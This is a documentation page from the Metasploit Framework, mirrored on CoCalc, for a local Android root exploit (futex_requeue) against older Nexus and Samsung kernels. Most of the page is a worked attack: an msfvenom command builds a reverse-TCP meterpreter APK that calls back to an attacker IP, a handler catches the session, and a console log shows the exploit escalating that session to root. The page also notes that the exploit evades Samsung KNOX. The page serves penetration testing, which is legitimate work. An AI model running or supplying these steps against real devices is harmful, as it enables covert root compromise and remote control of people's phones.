CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/android/local/futex_requeue.md
Views: 1904

Vulnerable Application

This module exploits a Linux Kernel vulnerability, which is also available in the Android kernel, in a Linux subsystem call of futex. It does not trip (set off) Samsung NOX as of the time of writing.

Failed exploitation attempts may reboot the device.

Verification Steps

  1. Start msfconsole

  2. Get a shell on a vulnerable android device

  3. Do: use exploit/android/local/futex_requeue

  4. Select an appropriate target

  5. Do: set lhost [IP]

  6. Do: run

  7. You should get a root shell.

Targets

0 Automatic Targeting

Attempt to automatically determine the target

1 Default

Nexus 4, 5, 7, etc

2 New Samsung

Samsung S3, S4, S5, etc

3 Old Samsung

Samsung Note 2, etc

4 Samsung Grand

Samsung Grand, etc

Scenarios

Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)

The following was used to generate a meterpreter Android application, and it was installed to the device.

msfvenom -p android/meterpreter_reverse_tcp LHOST=111.111.1.111 LPORT=9999 -o /var/www/html/android.apk

[*] Processing android.128.rb for ERB directives.
resource (android.128.rb)> use exploit/multi/handler
resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
payload => android/meterpreter_reverse_tcp
resource (android.128.rb)> set lport 9999
lport => 9999
resource (android.128.rb)> set lhost 111.111.1.111
lhost => 111.111.1.111
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:9999 
[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:56975) at 2019-10-22 20:56:34 -0400
WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework

meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.4.0-1542239 (armv7l)
Meterpreter : dalvik/android
meterpreter > getuid
Server username: u0_a191
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/android/local/futex_requeue 
msf5 exploit(android/local/futex_requeue) > set session 1
session => 1
msf5 exploit(android/local/futex_requeue) > set verbose true
verbose => true
msf5 exploit(android/local/futex_requeue) > set lhost 111.111.1.111
lhost => 111.111.1.111
msf5 exploit(android/local/futex_requeue) > check

[+] Android version 4.4.2 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(android/local/futex_requeue) > run

[*] Started reverse TCP handler on 111.111.1.111:4444 
[+] Android version 4.4.2 appears to be vulnerable
[*] Found device: d2vzw
[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/thelr
[*] Loaded library /data/data/com.metasploit.stage/files/thelr, deleting
[*] Waiting 300 seconds for payload
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:37502) at 2019-10-22 20:57:45 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0